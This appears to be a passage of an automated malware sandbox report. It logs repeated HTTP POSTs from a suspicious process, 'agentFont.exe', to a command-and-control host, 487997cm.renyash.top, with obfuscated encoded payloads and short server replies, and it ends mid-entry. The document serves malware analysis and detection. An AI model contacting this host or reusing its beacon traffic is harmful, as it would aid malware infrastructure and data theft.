                                                                                  Data Ascii: QPXYTCUQY_[RZZY]UQT^QX[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z?1= 7&.6A-/U&Y>3^#5&$?*B85%<:&X"#\.
                                                                                  Jan 1, 2025 11:28:14.862943888 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:14.990082979 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:11 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  71192.168.2.449914185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:15.119556904 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:15.471493959 CET1040OUTData Raw: 54 5b 58 59 54 4b 55 5d 59 5f 5b 52 5a 5a 59 5c 55 57 54 5b 51 5b 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[XYTKU]Y_[RZZY\UWT[Q[[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+6#[+&.&D-,%/2^%,!#6!0/+' #=>+*&X"#\.
                                                                                  Jan 1, 2025 11:28:15.775003910 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:15.905894995 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  72192.168.2.449921185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:16.057774067 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  73192.168.2.449926185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:16.227993965 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:16.580862045 CET1340OUTData Raw: 51 50 58 5c 54 4a 55 5b 59 5f 5b 52 5a 5b 59 54 55 5f 54 59 51 5e 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QPX\TJU[Y_[RZ[YTU_TYQ^[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._("5W#829:>$%?!':6:'5R);"!^(*&X"#\.,
                                                                                  Jan 1, 2025 11:28:16.867933989 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:16.998817921 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 59 2a 40 28 01 24 02 25 15 24 3e 20 0f 2b 0d 26 1f 2c 12 00 03 26 29 3f 01 28 33 01 16 3d 28 32 59 2b 04 23 02 32 54 30 1d 31 0f 2a 51 00 1c 23 13 28 05 01 12 3c 06 0f 0f 29 0f 23 5c 29 2c 3b 59 22 29 33 54 26 3b 25 0a 30 3e 37 5d 3c 2c 3c 51 2c 36 2b 16 2f 33 2b 59 33 0c 2f 52 09 14 21 12 29 30 37 56 32 32 32 1d 33 0e 27 1e 20 3b 23 1e 37 1c 0b 1f 34 33 0d 1f 28 5b 37 58 35 31 2d 02 26 02 32 07 2b 03 09 51 35 14 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: 'Y*@($%$> +&,&)?(3=(2Y+#2T01*Q#(<)#\),;Y")3T&;%0>7]<,<Q,6+/3+Y3/R!)07V2223' ;#743([7X51-&2+Q5#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  74192.168.2.449927185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:16.365537882 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:16.721601009 CET1040OUTData Raw: 51 56 58 58 51 46 55 51 59 5f 5b 52 5a 5a 59 5d 55 53 54 58 51 5d 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QVXXQFUQY_[RZZY]USTXQ][^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.( [8]%.:E:(&?^$)6%9T$<=+$3"+&X"#\.
                                                                                  Jan 1, 2025 11:28:17.001286983 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:17.130110979 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  75192.168.2.449933185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:17.259016991 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:17.612258911 CET1044OUTData Raw: 54 55 5d 5a 51 47 55 51 59 5f 5b 52 5a 5d 59 51 55 57 54 5d 51 5f 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TU]ZQGUQY_[RZ]YQUWT]Q_[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+19 -#$.6-=3T&:\0!661U0<)S*'5>)?&X"#\.
                                                                                  Jan 1, 2025 11:28:17.896120071 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:18.026186943 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:14 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  76192.168.2.449939185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:18.167355061 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:18.518404007 CET1044OUTData Raw: 51 52 5d 53 54 4b 55 51 59 5f 5b 52 5a 5d 59 55 55 53 54 59 51 58 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR]STKUQY_[RZ]YUUSTYQX[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<2& [ $=E-$?=%?"X52$,2>,!>+&X"#\.
                                                                                  Jan 1, 2025 11:28:18.857934952 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:19.028489113 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  77192.168.2.449946185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:19.166033030 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:19.518395901 CET1044OUTData Raw: 51 52 5d 5b 51 46 55 5f 59 5f 5b 52 5a 58 59 55 55 50 54 58 51 5a 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR][QFU_Y_[RZXYUUPTXQZ[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(2"47%..31%$?:X"%$V)'?\5=%?:&X"#\.
                                                                                  Jan 1, 2025 11:28:19.803261995 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:19.934016943 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  78192.168.2.449956185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:20.068250895 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:20.424664974 CET1044OUTData Raw: 51 57 58 5f 51 44 50 59 59 5f 5b 52 5a 52 59 56 55 53 54 5e 51 5c 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QWX_QDPYY_[RZRYVUST^Q\[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+-W7=4%),-%)3<>#%)%/2>4(!-+:&X"#\.
                                                                                  Jan 1, 2025 11:28:20.732130051 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:20.869177103 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  79192.168.2.449962185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:21.010674000 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:21.362304926 CET1044OUTData Raw: 51 50 5d 5a 54 4b 55 50 59 5f 5b 52 5a 5f 59 53 55 5e 54 51 51 5f 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]ZTKUPY_[RZ_YSU^TQQ_[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<1=#>#&[5:[3R&3<&"%?>>'_6-1_+&X"#\.<
                                                                                  Jan 1, 2025 11:28:21.675456047 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:21.811707020 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  80192.168.2.449968185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:21.942708015 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  81192.168.2.449970185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:22.011842966 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:22.362166882 CET1340OUTData Raw: 54 50 5d 5d 51 46 50 5b 59 5f 5b 52 5a 5b 59 50 55 53 54 5e 51 50 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]]QFP[Y_[RZ[YPUST^QP[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?1>7#%5.#U%?1$,65-3Y>*$;\51X(&X"#\.,
                                                                                  Jan 1, 2025 11:28:22.656697989 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:22.787827969 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 10 3e 18 30 02 25 28 32 09 24 3d 38 0d 28 0d 21 00 2d 3c 25 5a 25 2a 0a 58 2b 55 33 52 3d 3b 04 15 3f 03 34 11 31 0b 3f 0d 24 35 2a 51 00 1c 23 59 2b 38 24 06 3f 01 36 1d 29 1f 3c 05 3c 2f 34 02 22 14 2b 56 27 38 2a 56 27 03 27 5d 3c 3f 30 57 3b 25 06 02 3b 30 2c 01 24 26 2f 52 09 14 21 11 29 55 3b 56 26 54 22 5b 33 30 09 5b 21 3b 3b 56 37 0b 2a 09 23 1d 0d 5d 28 5b 27 58 36 0f 22 11 31 2c 03 1d 3c 03 38 08 21 14 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: '>0%(2$=8(!-<%Z%*X+U3R=;?41?$5*Q#Y+8$?6)<</4"+V'8*V'']<?0W;%;0,$&/R!)U;V&T"[30[!;;V7*#](['X6"1,<8!#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  82192.168.2.449971185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:22.130012035 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:22.487135887 CET1044OUTData Raw: 54 55 58 59 54 42 55 5e 59 5f 5b 52 5a 5c 59 5c 55 52 54 59 51 5b 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TUXYTBU^Y_[RZ\Y\URTYQ[[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^)19".(]%5:>31<.$<="0?);5*?&X"#\.0
                                                                                  Jan 1, 2025 11:28:22.787524939 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:22.922365904 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  83192.168.2.449980185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:23.074376106 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:23.424779892 CET1044OUTData Raw: 51 50 5d 59 54 46 55 5d 59 5f 5b 52 5a 5c 59 5c 55 50 54 58 51 5a 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]YTFU]Y_[RZ\Y\UPTXQZ[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(":4>?$.5-12_3"$/+$_"!X(*&X"#\.0
                                                                                  Jan 1, 2025 11:28:23.709578037 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:23.837861061 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  84192.168.2.449987185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:23.998079062 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:24.346529961 CET1044OUTData Raw: 54 5b 5d 5b 54 40 50 5b 59 5f 5b 52 5a 5f 59 5d 55 51 54 5b 51 5e 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[][T@P[Y_[RZ_Y]UQT[Q^[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(=W#'&>E.=W&/X$&X"'2=3_6.!<:&X"#\.<
                                                                                  Jan 1, 2025 11:28:24.634610891 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:24.761995077 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  85192.168.2.449993185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:24.894813061 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
